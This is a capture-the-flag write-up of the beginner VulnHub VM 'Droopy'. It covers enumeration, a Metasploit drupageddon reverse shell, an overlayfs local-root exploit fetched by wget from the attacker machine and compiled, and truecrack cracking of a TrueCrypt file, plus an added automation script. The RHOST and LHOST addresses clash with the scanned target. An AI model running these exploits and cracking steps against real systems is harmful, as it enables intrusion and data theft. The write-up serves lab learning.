Droopy: v0.2

Location

CTF challenge @ vulnhub.com

Description

Welcome to Droopy. This is a beginner’s boot2root/CTF VM.
The VM is set to grab a DHCP lease on boot.

There are 2 hints I would offer you:
1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.

Enumeration

It’s a beginner’s boot2root. So let’s see how fast I can get the final flag with this CTF.
Like always let’s find out what ports are open for business.

nmap -A -sV -T4 -p- 192.168.56.102

Port 80 is open and a quick look shows that there’s a list available with directories at robots.txt.

(screenshot: nmap output)

The site runs on Drupal a Content Management System (CMS).
Let’s scan the site with ‘droopescan’. This program isn’t part of a standard Kali install, and apt-get install droopescan won’t work; use pip install droopescan instead.

(screenshot: droopescan output)

Exploitation

After checking exploit-db I saw that there were a lot of exploits to choose from. I know there are plenty of working Python exploits I could run myself that would grant me administrator access. But that route means manually changing the site settings so I can upload a PHP script (my favorite is the one from pentestmonkey) and trigger it by visiting the page. That’s why I chose the exploit offered in Metasploit (drupageddon) and got a reverse shell the easy way (time’s a wasting :)).

use exploit/multi/http/drupal_drupageddon
set RHOST 192.168.56.2
set LHOST 192.168.56.102
exploit

(screenshot: Metasploit session)

Escalating privileges

And I’m in. Time for a proper shell and to see what the machine is running on.

shell
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@droopy:/etc$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

It seems the machine runs on Ubuntu 14.04. I know this version is vulnerable to the ‘overlayfs’ local root exploit. To use it I need gcc and wget on the target, and a quick check shows both are at my disposal. I copied the script for the ‘overlayfs’ Local Root Exploit (https://www.exploit-db.com/exploits/39166/) and now it’s time to get it over to the other machine.

wget http://192.168.56.102/overlayfs.c
--2016-08-01 23:52:16-- http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: 'overlayfs.c'

100%[======================================>] 4,968 --.-K/s in 0s

2016-08-01 23:52:17 (198 MB/s) - 'overlayfs.c' saved [4968/4968]

www-data@droopy:/tmp$ gcc overlayfs.c -o overlayfs
gcc overlayfs.c -o overlayfs
www-data@droopy:/tmp$ chmod 777 overlayfs
chmod 777 overlayfs
www-data@droopy:/tmp$ ./overlayfs
./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root

Decryption

After looking around the system I noticed that there was no flag.txt in the root directory, but there was a TrueCrypt file named dave. Like the hint said, you need the rockyou wordlist.
Time to get cracking. I downloaded the TrueCrypt file to my machine with meterpreter for a faster cracking attempt.

truecrack -t dave.tc -w /usr/share/wordlists/rockyou.txt

This is gonna take some time. So in the meantime I’m going to further explore the system to see what can be found.

Looks like there is just one user ‘gsuser’. Nothing really in the home directory. I found a mail in /var/www-mail.

(screenshot: the mail found in /var/www-mail)

I already found the encrypted file and truecrack is running as we speak. But there are some things in this mail that can possibly speed up truecrack: there is a mention of an academy and of a song by The Jam. Let’s start with academy first.

grep -i ".*academy.*" rockyou.txt > newlist.txt

That gives a smaller list of only 240 words. Let’s try it with truecrack. Because I don’t know which hash type was used, I start with the default option ripemd160, then sha512 and finally whirlpool.

truecrack -t dave.tc -w newlist.txt -k ripemd160

Nothing 😦

truecrack -t dave.tc -w newlist.txt -k sha512

(screenshot: truecrack finds the password)
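The two steps above (narrow rockyou with keywords taken from the mail, then try each truecrack hash type in order) as a small added script; this is not from the original post. It assumes truecrack is on the PATH and prints "Found password" on a hit.

```shell
#!/bin/sh
# Added example: keyword-narrowed wordlist plus truecrack hash-type loop.
set -u

# build_wordlist OUTFILE BASE_WORDLIST KEYWORD...
# Keeps every line of BASE_WORDLIST containing any keyword (case-insensitive,
# like the grep -i in the write-up), drops duplicates, prints the count kept.
build_wordlist() {
    out=$1; base=$2; shift 2
    pattern=""
    for kw in "$@"; do
        pattern="${pattern:+$pattern|}$kw"
    done
    grep -iE "$pattern" "$base" | sort -u > "$out"
    wc -l < "$out" | tr -d ' '
}

# try_hashes CONTAINER WORDLIST
# Runs truecrack once per hash type in the order used above and stops at the
# first hit. Assumption: truecrack reports success with "Found password".
try_hashes() {
    container=$1; wordlist=$2
    for hash in ripemd160 sha512 whirlpool; do
        if truecrack -t "$container" -w "$wordlist" -k "$hash" | grep -q 'Found password'; then
            echo "$hash"
            return 0
        fi
    done
    return 1
}

# Usage (container and wordlist paths from the write-up):
#   n=$(build_wordlist newlist.txt /usr/share/wordlists/rockyou.txt academy jam)
#   echo "$n candidates"; try_hashes dave.tc newlist.txt
```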

Mounting and exploring

Nice. Now it’s time to mount the file and check what’s inside.
For mounting the truecrypt file I’ll be using Veracrypt.

(screenshot: mounting dave.tc with VeraCrypt)

ls -alR

(screenshot: ls -alR output of the mounted volume)

The final flag

Looks like the flag is inside a hidden directory.

(screenshot: the final flag)

Alright. Nice challenge from which I’ve learned a few new tricks.
Timer stopped at 4 hours. Mostly thanks to the truecrypt file.
